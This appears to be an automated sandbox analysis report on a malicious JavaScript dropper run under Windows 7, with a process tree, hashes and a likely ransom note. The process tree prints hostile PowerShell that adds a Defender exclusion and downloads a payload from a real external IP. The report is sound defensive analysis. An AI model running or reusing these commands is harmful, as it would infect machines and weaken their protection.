Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    27/05/2023, 06:47

General

  • Target

    c80a26b806b3486c6157d8904c2e13e7.js

  • Size

    1KB

  • MD5

    c80a26b806b3486c6157d8904c2e13e7

  • SHA1

    54d8be3eb5bdd4a788dcef3265cab6c314be1ccc

  • SHA256

    64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

  • SHA512

    4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js
    1⤵
    • Blocklisted process makes network request
    PID:828
  • C:\Windows\system32\cmd.exe
    cmd /c start /MIN C:\ProgramData\BLD.bat
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:892
  • C:\Windows\system32\cmd.exe
    cmd /c start C:\ProgramData\zayavka2.txt
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:676
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:788

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\BLD.bat

          Filesize

          322B

          MD5

          018d63793042f588a85968475d98decf

          SHA1

          2c4f9a0bd490c2b53976adf08805dcc92fac349a

          SHA256

          afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0

          SHA512

          ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

        • C:\ProgramData\zayavka2.txt

          Filesize

          1KB

          MD5

          6cea5f86700d707b53b8f4a67d1ccf29

          SHA1

          37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54

          SHA256

          6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70

          SHA512

          d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

        • memory/892-74-0x000000001B3A0000-0x000000001B682000-memory.dmp

          Filesize

          2.9MB

        • memory/892-75-0x0000000002010000-0x0000000002018000-memory.dmp

          Filesize

          32KB

        • memory/892-76-0x0000000002610000-0x0000000002690000-memory.dmp

          Filesize

          512KB

        • memory/892-77-0x0000000002610000-0x0000000002690000-memory.dmp

          Filesize

          512KB

        • memory/892-78-0x000000000261B000-0x0000000002652000-memory.dmp

          Filesize

          220KB